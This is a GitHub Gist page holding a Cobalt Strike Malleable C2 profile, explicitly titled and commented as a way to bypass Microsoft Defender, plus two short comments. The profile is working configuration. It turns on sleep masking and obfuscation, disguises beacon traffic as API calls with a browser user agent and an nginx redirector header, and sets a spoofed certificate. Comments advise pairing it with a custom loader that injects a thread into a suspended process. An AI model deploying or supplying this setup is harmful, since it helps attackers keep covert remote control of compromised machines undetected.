Last active
April 1, 2025 22:38
-
-
Save tothi/8abd2de8f4948af57aa2d027f9e59efe to your computer and use it in GitHub Desktop.
Minimal Cobalt Strike C2 Profile for Bypassing Defender
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
| # as stage0, remote injecting a thread into a suspended process works | |
| set host_stage "false"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
| set sleeptime "10000"; | |
| stage { | |
| set allocator "MapViewOfFile"; | |
| set name "notevil.dll"; | |
| set obfuscate "true"; | |
| set sleep_mask "true"; # if omitted, Defender catches the 1st connect back as Behavior:Win32/CobaltStrike.[EH]!sms | |
| } | |
| http-get { | |
| set uri "/apiv8/getStatus"; | |
| client { | |
| header "X-Client" "notevil"; # for nginx redirector | |
| metadata { | |
| base64; | |
| header "Cookie"; | |
| } | |
| } | |
| server { | |
| output { | |
| print; | |
| } | |
| } | |
| } | |
| http-post { | |
| set uri "/apiv8/updateConfig"; | |
| client { | |
| header "X-Client" "notevil"; # for nginx redirector | |
| id { | |
| base64url; | |
| parameter "key"; | |
| } | |
| output { | |
| print; | |
| } | |
| } | |
| server { | |
| output { | |
| print; | |
| } | |
| } | |
| } | |
| https-certificate { | |
| set C "US"; | |
| set CN "update.secureapp9.com"; | |
| set O "netsecurity"; | |
| set OU "Certificate Authority"; | |
| set validity "365"; | |
| } |
actually I call stage0 the customized artifact kit.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
What is stage0 loader? Is it stageless loader?